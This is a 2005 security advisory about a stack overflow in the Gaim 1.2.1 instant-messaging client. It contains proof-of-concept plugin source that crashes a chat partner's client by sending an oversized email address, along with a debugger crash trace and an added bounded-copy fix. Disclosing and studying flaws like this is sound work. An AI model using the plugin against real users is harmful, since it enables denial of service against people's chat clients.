[EXPL] Gaim Stack Overflow (PoC)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/15/05
To: list@securiteam.com Date: 15 May 2005 19:02:26 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Gaim Stack Overflow (PoC)
------------------------------------------------------------------------
SUMMARY
"Gaim <http://gaim.sourceforge.net/> is a multi-protocol instant
messaging (IM) client for Linux, BSD, MacOS X, and Windows. It is
compatible with AIM and ICQ (Oscar protocol), MSN Messenger, Yahoo!, IRC,
Jabber, Gadu-Gadu, SILC, GroupWise Messenger, and Zephyr networks."
A stack overflow vulnerability exists in Gaim. Exploiting this
vulnerability can lead to denial of service or, potentially, arbitrary
code execution.
DETAILS
Vulnerable Systems:
* Gaim version 1.2.1
Ron was looking at the stack overflow reported in Gaim 1.2.1. It was
actually pretty trivial to find. The line that contains it looks like
this:
strcpy(url_buf, gurl_buf->str);
url_buf is an 8192-byte buffer, and gurl_buf->str is an email address that
is being displayed (user controlled).
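The unbounded copy above beside a length-checked replacement, as an added example. This is not Gaim's code and not the project's actual fix; copy_bounded, check_address_of_length and URL_BUF_SIZE are hypothetical names, and the test addresses are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define URL_BUF_SIZE 8192   /* size of url_buf as stated in the advisory */

/* Vulnerable form quoted in the advisory: strcpy(url_buf, gurl_buf->str); */

/* Hypothetical helper: copy src into dst only if it fits, terminator included.
 * Returns 0 on success, -1 if src is too long (dst is then set to ""). */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len;
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    len = strlen(src);
    if (len >= dst_size) {      /* no room for the NUL byte: reject */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Builds a constructed address of total_len characters ("A@AAA...") and
 * passes it through the checked copy. Returns copy_bounded()'s result. */
int check_address_of_length(size_t total_len)
{
    char url_buf[URL_BUF_SIZE];
    char *addr = malloc(total_len + 1);
    int rc;
    if (addr == NULL || total_len < 3) { free(addr); return -1; }
    memset(addr, 'A', total_len);
    addr[1] = '@';
    addr[total_len] = '\0';
    rc = copy_bounded(url_buf, sizeof url_buf, addr);
    if (rc == 0 && strlen(url_buf) != total_len)
        rc = -1;                /* copy must be complete, never truncated */
    free(addr);
    return rc;
}

int main(void)
{
    printf("8191 chars:  %d\n", check_address_of_length(8191));
    printf("10002 chars: %d\n", check_address_of_length(10002));
    return 0;
}
```

The longest address that fits is 8191 characters, because the terminator takes the last byte; the caller decides whether a rejected address is dropped or displayed without linkification.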
The difficulty in writing a real exploit is that the input is sanitized,
so any character over 128, as well as ' ', ',', '\n', '<', and others are
stripped away. This doesn't leave much to play with, although it would be
possible to write an exploit under these conditions.
Another difficulty is that most chat protocols limit you to a reasonable
message size, and 8192 is typically well above that size. So even if you
could successfully create an exploit, you would still have to do it on a
chat protocol that allows very long messages. The final difficulty is that
you also process the URL locally, when you send it, but that's not really
a big deal. It would be trivial to filter it out in a plugin to make sure
you don't crash yourself.
For this example, Ron just threw together a quick plugin (based on an old
plugin he wrote, which is why it's such a mess) which sends a
10002-character email address when the user types "/vuln". Gaim crashes at
the address 0x41414141.
(gdb) run
Starting program: /usr/local/bin/gaim
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 24908)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 24908)]
0x41414141 in ?? ()
Proof of Concept:
// Written by Ron <iago@valhallalegends.com>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow
// vulnerability when processing email addresses. What this basically does
// is segfault you when you do a /vuln command in a conversation, and, if
// you're using a protocol that allows a 10002-character message to go
// through, also segfaults the person you sent it to.
// The reason is that gaim's stack is overwritten with a whole bunch of
// 'A's, and the return address of the function ends up at 0x41414141.
// That's no good for anybody.
//
// This code should be considered public domain, and is freely
// modifiable/distributable by any and everyone.
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's source
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so". This will compile
// vuln-plugin.so.
// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.
#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include "internal.h"
#include "gtkgaim.h"
#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"
#include "gtkplugin.h"
#include "gtkutils.h"
#define ME "1.2.1 Vuln Check"
#define MAXLENGTH 1024
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for URL encoding vulnerability."
static GaimCmdId cmd;
char *code = "A@AAAA...(A*8192)...AAAAA";
gboolean go(GaimConversation *conv, const gchar *cmd, gchar **args,
            gchar **error, void *data)
{
    gaim_conv_im_send(GAIM_CONV_IM(conv), code);
    return GAIM_CMD_STATUS_OK;
}
static gboolean plugin_load(GaimPlugin *plugin)
{
    cmd = gaim_cmd_register("vuln", "", GAIM_CMD_P_DEFAULT, GAIM_CMD_FLAG_IM,
                            NULL, (GaimCmdFunc)go, "/vuln", NULL);
    return TRUE;
}
static gboolean plugin_unload(GaimPlugin *plugin)
{
    gaim_cmd_unregister (cmd);
    return TRUE;
}
static GaimPluginInfo info =
{
    GAIM_PLUGIN_MAGIC,
    GAIM_MAJOR_VERSION,
    GAIM_MINOR_VERSION,
    GAIM_PLUGIN_STANDARD,             /**< type */
    NULL,                             /**< ui_requirement */
    0,                                /**< flags */
    NULL,                             /**< dependencies */
    GAIM_PRIORITY_DEFAULT,            /**< priority */
    NULL,                             /**< id */
    N_("1.2.1 Email Overflow Demo"),  /**< name */
    VERSION,                          /**< version */
    /** summary */
    N_(""),
    /** description */
    N_(""),
    "Ron <iago@valhallalegends.com>", /**< author */
    "",                               /**< homepage */
    plugin_load,                      /**< load */
    plugin_unload,                    /**< unload */
    NULL,                             /**< destroy */
    NULL,                             /**< ui_info */
    NULL,                             /**< extra_info */
    NULL,
    NULL
};
static void init_plugin(GaimPlugin *plugin)
{
}
GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info)
ADDITIONAL INFORMATION
The information has been provided by Ron <mailto:iago@valhallalegends.com>.